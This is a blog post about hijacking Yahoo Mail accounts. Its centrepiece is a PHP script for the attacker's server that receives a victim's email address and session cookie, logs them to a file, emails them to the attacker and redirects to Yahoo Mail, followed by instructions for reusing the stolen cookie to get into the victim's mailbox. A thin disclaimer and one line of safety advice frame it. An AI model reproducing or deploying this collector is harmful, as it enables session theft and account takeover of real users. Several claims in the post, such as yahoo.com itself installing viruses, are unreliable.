What you think is the biggest challenge for hackers in this world? Definitely the answer is hacking world’s number one website, Yahoo.com.Yahoo is hacked so many times in last 5-6 years. Some hackers made yahoo infected with viruses in past. Means whenever you open yahoo.com it installs some viruses on your PC. So guess at what extent did yahoo has been hacked.
But with later new launches of yahoo’s beta versions, yahoo is more and more secured day by day.

Yahoo’s network security administrator works daily to keep yahoo cleaned.
What I mean is yahoo is all time target for hackers.
In last year yahoo detected a bug in its database which used to steal email addresses and password. Here is a small description of the bug and its features.

How hackers steal yahoo passwords

You might have noticed that some yahoo accounts accessed by an unknown person which used it to send promotional emails to list of friends of that accounts who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends.
By this way in the geometric progression 1 account becomes 2, 2 then 4, 4 to 8, 8 to 16 and by this way chain goes on increasing giving the hackers millions of new email id’s to send exmails to. Hopefully yahoo wakes up.
I searched on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easier to attack than to defend they say.
It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easily accessing the victim’s yahoo email.

The bug:

…which calls this php script:

?
$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}

header(”Location:http://mail.yahoo.com”); ?>…which writes the cookie to the hackers .log file that resides on his server.

A very simple example but so deadly. This was invented very much back but notes that old things are always used by hackers as weapon.
NOTE: The code is a little changed to make it hard to use without PHP knowledge.
Advice for being safe from this bug:
DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER.
Disclaimer:
This article is meant to provide more information on how to protect your yahoo account and every account in general and should not be used for stealing someone’s info, password etc. Using this information for such purposes makes a crime and eventually you can be busted by yahoo security administrators. So think twice.

Enter your email address to get free software's windows and virus removal tricks: SMS Alerts: Get news headlines on your mobile phone for freeMOBILE ALERTS

0 comments

Post a Comment

Blog Widget by LinkWithin

Like us on FaceBooooooook

About author

Vishnu vardhan Reddy Boda is Tech Blogger and Software Engineer.

know more about vishnu

Recently Digged Indanam (fuel)

Get our posts as email

http://lh6.ggpht.com/_s0ANCL8E8sQ/SY7SyZ6WkXI/AAAAAAAAAhg/-qr1lvldUdA/Newspaper_Feed_128x128newcopy-1.png Sign up for our daily email newsletter

Dont miss any thing Enter your email address:

SMS Alerts: Get news headlines on your mobile phone for free